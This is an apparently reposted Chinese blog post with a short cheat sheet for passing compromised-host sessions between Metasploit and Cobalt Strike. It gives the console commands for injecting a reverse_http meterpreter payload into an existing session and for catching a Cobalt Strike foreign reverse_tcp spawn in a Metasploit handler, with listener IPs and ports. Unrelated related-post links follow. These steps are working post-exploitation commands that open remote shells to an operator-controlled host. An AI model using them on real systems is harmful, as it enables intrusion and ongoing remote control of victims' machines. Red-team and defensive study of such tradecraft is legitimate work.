zoukankan      html  css  js  c++  java
  • metasploit与Cobaltstrike互相派生shell

    https://www.cnblogs.com/test404/p/10599981.html

    • msf 派生 shell 给 Cobalt strike(前提有一个meterpreter)
        msf exploit(handler) >  use exploit/windows/local/payload_inject
      msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
      msf exploit(payload_inject) > set DisablePayloadHandler true
      msf exploit(payload_inject) > set LHOST 192.168.229.143
      msf exploit(payload_inject) > set LPORT 1212
      msf exploit(payload_inject) > set SESSION 1
      msf exploit(payload_inject) > exploit
    
    • Cobalt strike 派生 shell 给 MSF(前提有个beaconshell)
    msf > use exploit/multi/handler 
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 192.168.1.100
    lhost => 192.168.1.100
    msf exploit(handler) > set lport 5555
    lport => 5555
    msf exploit(handler) > exploit
    

    之后使用Cobalt Strike创建一个

    windows/foreign/reverse_tcp Listener
    其中ip为msf的ip地址,端口为msf所监听的端口。
    然后选中计算机,右键->Spawn,选择刚刚创建的监听器:
    msf中即可看到成功获取了meterpreter会话

  • 相关阅读:
    7-25 念数字
    7-24 约分最简分式
    7-23 币值转换
    HDU-1102-Constructing Roads
    HDU-1301-Jungle Roads
    链式向前星
    HDU-1217-Arbitrage(SPFA)
    POJ-1258-Agri-Net
    HDU-1863-畅通工程
    POJ-3050-Hoscotch
  • 原文地址:https://www.cnblogs.com/mrhonest/p/12348710.html
Copyright © 2011-2022 走看看